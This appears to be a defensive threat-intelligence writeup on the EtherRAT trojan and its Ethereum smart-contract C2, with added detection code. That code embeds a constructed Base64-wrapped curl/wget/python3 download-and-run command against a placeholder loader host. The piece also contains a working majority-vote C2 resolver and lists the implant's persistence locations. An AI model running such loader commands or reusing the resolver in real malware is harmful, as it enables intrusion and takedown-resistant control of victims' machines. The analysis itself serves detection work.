EtherRAT Malware

A recently uncovered threat campaign attributed to North Korean operators is believed to be exploiting React2Shell, a critical vulnerability in React Server Components (RSC), to deploy a previously unseen remote access trojan called EtherRAT. The malware stands out for three reasons: it resolves its Command-and-Control (C2) address through Ethereum smart contracts, it installs several layers of persistence on Linux, and it ships its own Node.js runtime rather than relying on one already present on the host.

Links to the Ongoing 'Contagious Interview' Operations

Researchers have identified strong overlaps between EtherRAT activity and the long-running campaign tracked as Contagious Interview, whose operators have used the EtherHiding technique for malware delivery since early 2025.

These operations typically target blockchain and Web3 developers by masking malicious intentions behind fabricated job interviews, coding tests, and video assessments. Victims are usually contacted through platforms such as LinkedIn, Upwork, and Fiverr, where attackers impersonate legitimate recruiters offering high‑value employment opportunities.

Researchers describe this cluster as one of the most prolific malicious actors in the npm ecosystem, reflecting its skill at infiltrating JavaScript supply chains and crypto-focused developer workflows.

The Initial Breach: React2Shell Exploitation

The attack chain begins with exploitation of CVE-2025-55182, the React2Shell remote code execution flaw in React Server Components, rated CVSS 10.0. Through this flaw the attackers execute a Base64-encoded command that downloads and runs a shell script, and that script in turn stages the primary JavaScript implant.

The script is fetched with curl, falling back to wget and then python3 if curl is unavailable. Before launching the main payload it prepares the host by downloading Node.js v20.10.0 directly from nodejs.org, then writes two files to disk: an encrypted data blob and an obfuscated JavaScript dropper. To limit forensic traces the script cleans up after itself once staging is complete and hands control to the dropper.
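The staging chain above leaves a recognisable shape in process-execution telemetry: a shell invoked with a Base64 blob that, once decoded, contains a curl/wget/python3 download chain handing a script to a shell and a fetch from nodejs.org. The following triage routine is an added example, not code from the article or from EtherRAT; the sample command lines are constructed for the demonstration, every hostname is a placeholder, and the regex heuristics are this example's own choices rather than published indicators.

```javascript
// Added example, not code from the article or from EtherRAT: triage process
// command lines for the loader pattern described above. Sample command lines
// are constructed for the demonstration and all hostnames are placeholders.

// Tools that fetch content, and ways of handing fetched content to an interpreter.
const DOWNLOADERS = /\b(?:curl|wget|python3?\s+-c|python3?\s+-m\s+urllib)\b/;
const INTERPRETERS = /(?:\||;|&&|\|\|)\s*(?:ba)?sh\b|\b(?:ba)?sh\s+(?:-c\b|\S+\.sh\b)|\bnode\s+\S/;

// Decode every Base64-looking token of useful length; the initial command hides
// the real download chain inside one such token. Only printable results are kept.
function decodeBase64Tokens(cmdline) {
  const decoded = [];
  for (const token of cmdline.match(/[A-Za-z0-9+\/]{20,}={0,2}/g) || []) {
    const text = Buffer.from(token, 'base64').toString('utf8');
    if (/^[\t\n\r\x20-\x7e]+$/.test(text)) decoded.push(text);
  }
  return decoded;
}

// Inspect the raw command line and every decoded layer found inside it.
function inspectCommand(cmdline) {
  const layers = [cmdline, ...decodeBase64Tokens(cmdline)];
  const reasons = new Set();
  for (const text of layers) {
    if (DOWNLOADERS.test(text) && INTERPRETERS.test(text)) reasons.add('download-and-execute');
    if (/nodejs\.org\/dist\//.test(text)) reasons.add('fetches a Node.js runtime');
    if (/\/(?:tmp|var\/tmp|dev\/shm)\/\S+\.(?:sh|js)\b/.test(text)) reasons.add('script staged in a temp dir');
  }
  return { suspicious: reasons.size > 0, layers: layers.length, reasons: [...reasons] };
}

// Constructed sample: the inner script mirrors the curl -> wget -> python3 fallback
// and the Node.js download, wrapped in Base64 the way the exploit command is.
const INNER_SCRIPT = [
  'curl -fsSL http://loader.example.invalid/i.sh -o /tmp/i.sh',
  '|| wget -q http://loader.example.invalid/i.sh -O /tmp/i.sh',
  '|| python3 -c "import urllib.request as u; u.urlretrieve(\'http://loader.example.invalid/i.sh\', \'/tmp/i.sh\')";',
  'curl -fsSL https://nodejs.org/dist/v20.10.0/node-v20.10.0-linux-x64.tar.xz -o /tmp/node.tar.xz;',
  'sh /tmp/i.sh',
].join(' ');
const SAMPLE_CMDLINE = `sh -c "echo ${Buffer.from(INNER_SCRIPT).toString('base64')} | base64 -d | sh"`;

// Benign command lines that each share a single feature with the attack chain.
const BENIGN_CMDLINES = [
  'curl -fsSL https://example.invalid/release.tar.gz -o /opt/pkg/release.tar.gz',
  'bash -c "ls -la /var/log"',
];

console.log(inspectCommand(SAMPLE_CMDLINE));
for (const c of BENIGN_CMDLINES) console.log(c, '->', inspectCommand(c).suspicious);
```

The outer command line on its own only shows `base64 -d | sh`, which is common enough in legitimate tooling; the signal comes from decoding the embedded token and matching the download-and-execute combination inside it. Feed it the `args`/`cmdline` field from auditd, eBPF or EDR process events rather than shell history, which the loader never writes to.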

Delivery of EtherRAT: Encryption, Execution, and Smart Contract C2

The dropper does one thing: it decrypts the EtherRAT payload with a hard-coded key and launches it with the freshly downloaded Node.js binary. Because the key is embedded in the dropper, the encryption defeats only naive scanning of the stored blob; an analyst holding both files can recover the payload directly.

EtherRAT's standout feature is its use of EtherHiding: every five minutes it reads the current C2 server address from an Ethereum smart contract. Because the pointer lives on-chain and is read through public RPC endpoints with a read-only eth_call that needs no transaction, the operators can redirect the botnet by updating the contract state even after defenders take down the domains currently in use, while defenders cannot alter the on-chain value without the contract owner's key.

A distinctive twist in this implementation is a consensus-based lookup. EtherRAT queries nine public Ethereum RPC endpoints in parallel, collects the results, and trusts the C2 URL returned by the majority. This blunts several defensive responses: a single RPC endpoint that is compromised, sinkholed, rate-limited or serving stale data cannot redirect the botnet, and a defender would have to control a majority of the nine endpoints to do so. The practical counter is at the network layer: block or alert on outbound JSON-RPC traffic to public Ethereum endpoints from servers that have no business talking to Ethereum nodes.

Researchers previously spotted a similar technique in malicious npm packages colortoolsv2 and mimelib2, which were used to distribute downloader components to developers.
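The consensus lookup described above, as an added illustration that is not EtherRAT's code or the article's: it ABI-decodes the string that an eth_call returns, builds the JSON-RPC request shape an implant would POST, and applies a strict-majority vote across the responses. Endpoint labels, both URLs, the contract address and the 4-byte selector are made up for the example, and the choice to count unreachable endpoints against the quorum is this example's own, since the article does not say how the implant handles failures.

```javascript
// Added illustration, not EtherRAT's code or the article's: how an EtherHiding-style
// lookup turns raw eth_call results from several JSON-RPC endpoints into one C2 URL
// by majority vote. Endpoint labels, URLs, contract address and selector are made up.

// ABI-decode a `string` return value as it appears in an eth_call result:
// 32-byte offset, 32-byte length, then the UTF-8 bytes right-padded to 32 bytes.
function decodeAbiString(hexResult) {
  const hex = hexResult.startsWith('0x') ? hexResult.slice(2) : hexResult;
  if (hex.length < 128) throw new Error('too short for an ABI-encoded string');
  const offset = parseInt(hex.slice(0, 64), 16) * 2;             // byte offset -> hex chars
  const length = parseInt(hex.slice(offset, offset + 64), 16) * 2;
  const data = hex.slice(offset + 64, offset + 64 + length);
  if (data.length !== length) throw new Error('truncated ABI string');
  return Buffer.from(data, 'hex').toString('utf8');
}

// The inverse, used here only to build sample RPC responses.
function encodeAbiString(s) {
  const bytes = Buffer.from(s, 'utf8');
  const pad = Buffer.alloc((32 - (bytes.length % 32)) % 32);
  return '0x' + (32).toString(16).padStart(64, '0')
    + bytes.length.toString(16).padStart(64, '0')
    + Buffer.concat([bytes, pad]).toString('hex');
}

// The JSON-RPC body an implant would POST to each endpoint. The selector passed in
// is a hypothetical value; a real one is the first 4 bytes of keccak256(signature).
function buildEthCall(contractAddress, selectorHex, id = 1) {
  return { jsonrpc: '2.0', id, method: 'eth_call',
           params: [{ to: contractAddress, data: selectorHex }, 'latest'] };
}

// Strict majority over all queried endpoints. Failed endpoints (null) count against
// the quorum rather than being dropped; this is the example's policy, not a known
// property of the implant.
function majorityVote(values) {
  const counts = new Map();
  for (const v of values) if (v !== null) counts.set(v, (counts.get(v) || 0) + 1);
  let best = null, bestCount = 0;
  for (const [v, c] of counts) if (c > bestCount) { best = v; bestCount = c; }
  return bestCount * 2 > values.length ? best : null;
}

// results: [{ endpoint, result }] where result is the eth_call hex, or null on error.
function resolveC2(results) {
  const urls = results.map(r => {
    try { return r.result === null ? null : decodeAbiString(r.result); } catch { return null; }
  });
  return majorityVote(urls);
}

// Constructed scenarios: honest endpoints, endpoints sinkholed by a defender, failures.
const HONEST_URL = 'https://c2.example.invalid/api';
const SINKHOLE_URL = 'https://sinkhole.example.invalid/';
function scenario(honestCount, sinkholedCount, failedCount) {
  const results = [];
  const add = result => results.push({ endpoint: `rpc-${results.length}`, result });
  for (let i = 0; i < honestCount; i++) add(encodeAbiString(HONEST_URL));
  for (let i = 0; i < sinkholedCount; i++) add(encodeAbiString(SINKHOLE_URL));
  for (let i = 0; i < failedCount; i++) add(null);
  return results;
}

console.log(JSON.stringify(buildEthCall('0x' + '11'.repeat(20), '0xdeadbeef')));
console.log('8 honest / 1 sinkholed      ->', resolveC2(scenario(8, 1, 0)));
console.log('4 honest / 5 sinkholed      ->', resolveC2(scenario(4, 5, 0)));
console.log('4 honest / 5 unreachable    ->', resolveC2(scenario(4, 0, 5)));
```

Two things fall out of the vote: sinkholing one endpoint changes nothing (the 8/1 case), while controlling five of the nine does redirect the implant (the 4/5 case). The request body printed first is also the wire pattern to hunt for: an HTTPS POST whose JSON has `"method":"eth_call"`, leaving a server that has no reason to speak JSON-RPC.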

High‑Frequency Command Polling and Multi‑Layer Persistence

Once it has a C2 address, EtherRAT enters a tight polling loop, contacting the server every 500 milliseconds. Any response body longer than ten characters is treated as JavaScript and evaluated immediately on the compromised host, so the operators can push arbitrary code without deploying a new binary. The half-second cadence is itself a detection opportunity: a single host making roughly 120 small HTTP requests per minute to one external destination is unusual beaconing behaviour.

Long-term access is maintained through five persistence techniques that together cover the common user-level Linux startup paths:

Persistence Methods:

  • Systemd user service (~/.config/systemd/user)
  • XDG autostart entry (~/.config/autostart)
  • Cron jobs
  • .bashrc modification
  • Shell profile injection (e.g. ~/.profile)

Spreading across several execution paths means the implant survives reboots and the removal of any single entry: cleaning one location while leaving the others lets it re-establish itself at the next login or boot, so remediation has to cover all five at once.

Self‑Updating Capabilities and Obfuscation Strategy

EtherRAT also includes a self-update routine: it uploads its own source code to an API endpoint, receives a modified version back from the C2 server, and relaunches itself with the new variant. The update is functionally identical to the running code, but the returned payload is obfuscated differently each time, so file hashes and static signatures derived from one sample do not match the next. Detection therefore has to rest on behaviour (the RPC voting, the 500 ms polling, the persistence entries) rather than on file contents.

Code Overlaps With Previous JavaScript Threat Families

Further analysis shows that parts of EtherRAT's encrypted loader share patterns with BeaverTail, a JavaScript-based downloader and information stealer used in Contagious Interview operations. This reinforces the assessment that EtherRAT is either a direct successor to, or an extension of, the tooling used in that campaign.

Implications for Defenders: A Shift Toward Stealth and Persistence

EtherRAT marks a notable evolution in how React2Shell is being exploited. Rather than opportunistic goals such as cryptomining or credential theft, this implant prioritises stealthy, long-term access. The combination of smart-contract-driven C2, majority-vote endpoint verification, multiple persistence layers and continuous re-obfuscation makes it a hard target for static detection and infrastructure takedowns alike.

Key Takeaways for Security Teams

Security teams should note that EtherRAT represents a significant escalation in React2Shell exploitation, turning a one-shot remote code execution bug into a persistent and adaptable foothold. Its C2 infrastructure is unusually resilient: the Ethereum smart-contract lookup and the multi-endpoint consensus mechanism withstand sinkholing, takedowns and manipulation of individual endpoints. Its close association with the Contagious Interview campaign also points to a continued focus on high-value developer targets, so blockchain and Web3 development teams in particular should patch CVE-2025-55182, audit the five persistence locations listed above, and watch for hosts querying public Ethereum RPC endpoints or beaconing at sub-second intervals.
